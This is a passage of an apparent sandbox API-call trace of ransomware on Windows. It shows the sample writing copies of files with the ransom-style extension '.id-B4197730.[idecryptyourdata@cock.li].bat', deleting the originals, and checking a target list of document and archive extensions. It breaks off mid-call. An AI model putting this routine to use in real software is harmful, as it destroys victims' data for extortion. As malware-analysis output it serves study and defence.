[0046.833] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.833] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.833] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0046.833] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=18776) returned 1 [0046.833] CloseHandle (hObject=0x304) returned 1 [0046.833] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 0x80 [0046.834] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.834] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0046.834] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.834] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.834] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0046.835] GetLastError () returned 0x0 [0046.835] ReadFile (in: hFile=0x304, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x4958, lpOverlapped=0x0) returned 1 [0046.837] WriteFile (in: hFile=0x308, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x4960, lpOverlapped=0x0) returned 1 [0046.839] ReadFile (in: hFile=0x304, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.839] WriteFile (in: hFile=0x308, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.839] SetEndOfFile (hFile=0x308) returned 1 [0046.839] CloseHandle (hObject=0x308) returned 1 [0046.840] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.840] SetEndOfFile (hFile=0x304) returned 1 [0046.841] CloseHandle (hObject=0x304) returned 1 [0046.841] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.842] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 1 [0046.842] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.842] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.842] lstrlenW (lpString=".doc") returned 4 [0046.842] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.842] lstrlenW (lpString=".docx") returned 5 [0046.842] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.842] lstrlenW (lpString=".pdf") returned 4 [0046.842] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.842] lstrlenW (lpString=".xls") returned 4 [0046.842] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.842] lstrlenW (lpString=".xlsx") returned 5 [0046.842] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.842] lstrlenW (lpString=".ppt") returned 4 [0046.842] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.842] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.842] lstrlenW (lpString=".zip") returned 4 [0046.842] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.842] lstrlenW (lpString=".rar") returned 4 [0046.843] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.843] lstrlenW (lpString=".bz2") returned 4 [0046.843] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.843] lstrlenW (lpString=".7z") returned 3 [0046.843] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.843] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.843] lstrlenW (lpString=".dbf") returned 4 [0046.843] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.843] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.843] lstrlenW (lpString=".1cd") returned 4 [0046.843] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.843] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.843] lstrlenW (lpString=".jpg") returned 4 [0046.843] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.843] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.843] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.843] lstrlenW (lpString=".doc") returned 4 [0046.843] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.843] lstrlenW (lpString=".docx") returned 5 [0046.843] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.843] lstrlenW (lpString=".pdf") returned 4 [0046.843] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.843] lstrlenW (lpString=".xls") returned 4 [0046.843] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.843] lstrlenW (lpString=".xlsx") returned 5 [0046.843] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.843] lstrlenW (lpString=".ppt") returned 4 [0046.843] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.844] lstrlenW (lpString=".zip") returned 4 [0046.844] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.844] lstrlenW (lpString=".rar") returned 4 [0046.844] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.844] lstrlenW (lpString=".bz2") returned 4 [0046.844] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.844] lstrlenW (lpString=".7z") returned 3 [0046.844] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.844] lstrlenW (lpString=".dbf") returned 4 [0046.844] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.844] lstrlenW (lpString=".1cd") returned 4 [0046.844] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned 45 [0046.844] lstrlenW (lpString=".jpg") returned 4 [0046.844] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.844] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.844] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.844] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0046.845] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=16728) returned 1 [0046.845] CloseHandle (hObject=0x304) returned 1 [0046.845] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 0x80 [0046.845] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.845] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0046.846] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.846] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.846] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0046.848] GetLastError () returned 0x0 [0046.848] ReadFile (in: hFile=0x304, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x4158, lpOverlapped=0x0) returned 1 [0046.850] WriteFile (in: hFile=0x308, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x4160, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x4160, lpOverlapped=0x0) returned 1 [0046.851] ReadFile (in: hFile=0x304, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.851] WriteFile (in: hFile=0x308, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.851] SetEndOfFile (hFile=0x308) returned 1 [0046.851] CloseHandle (hObject=0x308) returned 1 [0046.852] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.852] SetEndOfFile (hFile=0x304) returned 1 [0046.853] CloseHandle (hObject=0x304) returned 1 [0046.853] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.854] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll")) returned 1 [0046.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.854] lstrlenW (lpString=".doc") returned 4 [0046.854] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.854] lstrlenW (lpString=".docx") returned 5 [0046.854] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.854] lstrlenW (lpString=".pdf") returned 4 [0046.854] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.854] lstrlenW (lpString=".xls") returned 4 [0046.854] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.854] lstrlenW (lpString=".xlsx") returned 5 [0046.854] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.854] lstrlenW (lpString=".ppt") returned 4 [0046.854] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.854] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.854] lstrlenW (lpString=".zip") returned 4 [0046.855] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.855] lstrlenW (lpString=".rar") returned 4 [0046.855] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.855] lstrlenW (lpString=".bz2") returned 4 [0046.855] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.855] lstrlenW (lpString=".7z") returned 3 [0046.855] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.855] lstrlenW (lpString=".dbf") returned 4 [0046.855] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.855] lstrlenW (lpString=".1cd") returned 4 [0046.855] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.855] lstrlenW (lpString=".jpg") returned 4 [0046.855] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.855] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.855] lstrlenW (lpString=".doc") returned 4 [0046.855] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.855] lstrlenW (lpString=".docx") returned 5 [0046.855] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.855] lstrlenW (lpString=".pdf") returned 4 [0046.855] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.855] lstrlenW (lpString=".xls") returned 4 [0046.855] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.855] lstrlenW (lpString=".xlsx") returned 5 [0046.855] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.855] lstrlenW (lpString=".ppt") returned 4 [0046.856] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.856] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.856] lstrlenW (lpString=".zip") returned 4 [0046.856] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.856] lstrlenW (lpString=".rar") returned 4 [0046.856] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.856] lstrlenW (lpString=".bz2") returned 4 [0046.856] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.856] lstrlenW (lpString=".7z") returned 3 [0046.856] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.856] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.856] lstrlenW (lpString=".dbf") returned 4 [0046.856] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.856] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.856] lstrlenW (lpString=".1cd") returned 4 [0046.856] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.856] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 45 [0046.856] lstrlenW (lpString=".jpg") returned 4 [0046.856] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.856] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.856] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.856] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0046.857] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=18776) returned 1 [0046.857] CloseHandle (hObject=0x304) returned 1 [0046.858] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 0x80 [0046.858] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.858] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0046.858] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.858] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.858] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0046.860] GetLastError () returned 0x0 [0046.860] ReadFile (in: hFile=0x304, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x4958, lpOverlapped=0x0) returned 1 [0046.862] WriteFile (in: hFile=0x308, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x4960, lpOverlapped=0x0) returned 1 [0046.863] ReadFile (in: hFile=0x304, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.863] WriteFile (in: hFile=0x308, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.863] SetEndOfFile (hFile=0x308) returned 1 [0046.864] CloseHandle (hObject=0x308) returned 1 [0046.865] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.865] SetEndOfFile (hFile=0x304) returned 1 [0046.866] CloseHandle (hObject=0x304) returned 1 [0046.866] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.866] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 1 [0046.867] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.867] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.867] lstrlenW (lpString=".doc") returned 4 [0046.867] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.867] lstrlenW (lpString=".docx") returned 5 [0046.867] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.867] lstrlenW (lpString=".pdf") returned 4 [0046.867] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.867] lstrlenW (lpString=".xls") returned 4 [0046.867] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.867] lstrlenW (lpString=".xlsx") returned 5 [0046.867] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.867] lstrlenW (lpString=".ppt") returned 4 [0046.867] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.867] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.867] lstrlenW (lpString=".zip") returned 4 [0046.867] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.867] lstrlenW (lpString=".rar") returned 4 [0046.867] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.867] lstrlenW (lpString=".bz2") returned 4 [0046.867] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.867] lstrlenW (lpString=".7z") returned 3 [0046.867] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.867] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.867] lstrlenW (lpString=".dbf") returned 4 [0046.867] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.867] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.867] lstrlenW (lpString=".1cd") returned 4 [0046.868] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.868] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.868] lstrlenW (lpString=".jpg") returned 4 [0046.868] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.868] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.868] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.868] lstrlenW (lpString=".doc") returned 4 [0046.868] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.868] lstrlenW (lpString=".docx") returned 5 [0046.868] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.868] lstrlenW (lpString=".pdf") returned 4 [0046.868] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.868] lstrlenW (lpString=".xls") returned 4 [0046.868] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.868] lstrlenW (lpString=".xlsx") returned 5 [0046.868] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.868] lstrlenW (lpString=".ppt") returned 4 [0046.868] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.868] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.868] lstrlenW (lpString=".zip") returned 4 [0046.868] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.868] lstrlenW (lpString=".rar") returned 4 [0046.868] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.868] lstrlenW (lpString=".bz2") returned 4 [0046.868] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.868] lstrlenW (lpString=".7z") returned 3 [0046.868] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.868] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.869] lstrlenW (lpString=".dbf") returned 4 [0046.869] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.869] lstrlenW (lpString=".1cd") returned 4 [0046.869] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0046.869] lstrlenW (lpString=".jpg") returned 4 [0046.869] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.869] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.869] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.869] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.156] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=18264) returned 1 [0047.156] CloseHandle (hObject=0x2e0) returned 1 [0047.156] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll")) returned 0x80 [0047.156] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.156] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.156] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.156] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.156] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.157] GetLastError () returned 0x0 [0047.157] ReadFile (in: hFile=0x2e0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x4758, lpOverlapped=0x0) returned 1 [0047.159] WriteFile (in: hFile=0x2c0, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x4760, lpOverlapped=0x0) returned 1 [0047.160] ReadFile (in: hFile=0x2e0, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, 